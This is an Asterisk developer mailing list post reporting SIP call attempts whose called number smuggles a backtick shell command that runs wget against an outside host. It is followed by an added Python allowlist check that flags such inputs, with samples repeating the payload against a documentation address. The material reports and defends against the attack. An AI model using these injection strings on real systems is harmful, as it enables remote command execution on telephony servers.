[asterisk-dev] A new kind of SIP attack ?
Pavel Troller
patrol at sinus.cz
Mon Sep 12 03:39:33 CDT 2011
Hi!
Since yesterday, I can see strange "call attempts" coming to my
switches over SIP to destinations like this:
00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`
I tried to wget the file manually and it was successful, but it was
empty (zero size).
I'm just informing about something which may be a new kind of hacking
attempt. I hope that Asterisk doesn't perform backtick expansion during
processing of the called number, but I'm writing it there to be sure
that a developer's eye will look at this and confirm it.
With regards,
Pavel Troller
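Added example, not part of the original post and not Asterisk code: one way to flag call attempts like the one reported above is to check the user part of the SIP Request-URI against an allowlist of dialable characters, both as received and with `%NN` and `\xNN` escapes expanded. The function names, the allowlist, the sample request lines and the 192.0.2.x addresses are constructed assumptions.

```python
import re
import string
from urllib.parse import unquote

# Assumption: the dialplan only needs these characters in a called number.
ALLOWED = set(string.digits + string.ascii_letters + "+*#-._")
REQUEST_LINE = re.compile(r"^[A-Z]+ sips?:(\S+) SIP/2\.0$")
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")

def called_user(request_line):
    """Return the percent-decoded user part of the Request-URI, or None."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m or "@" not in m.group(1):
        return None
    return unquote(m.group(1).rsplit("@", 1)[0])

def inspect(request_line):
    """Check the called user against the allowlist, raw and with \\xNN expanded."""
    user = called_user(request_line)
    if user is None:
        return None
    decoded = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), user)
    # Any character outside the allowlist, in either form, rejects the call.
    bad = sorted(set(user + decoded) - ALLOWED)
    return {"user": user, "decoded": decoded, "bad_chars": bad, "rejected": bool(bad)}

# Constructed sample request lines (documentation addresses, not real hosts).
SAMPLES = [
    r"INVITE sip:00123456789000@192.0.2.10 SIP/2.0",
    r"INVITE sip:+420123456789@pbx.example.net SIP/2.0",
    r"INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://192.0.2.66/V.php`@192.0.2.10 SIP/2.0",
    r"INVITE sip:0012345%60placeholder%60@192.0.2.10 SIP/2.0",
]

def flagged(lines):
    """Return (line, result) pairs for request lines whose called user is rejected."""
    results = [(line, inspect(line)) for line in lines]
    return [(line, r) for line, r in results if r and r["rejected"]]

if __name__ == "__main__":
    for line, r in flagged(SAMPLES):
        print("REJECT", repr(r["decoded"]), "bad:", "".join(r["bad_chars"]))
```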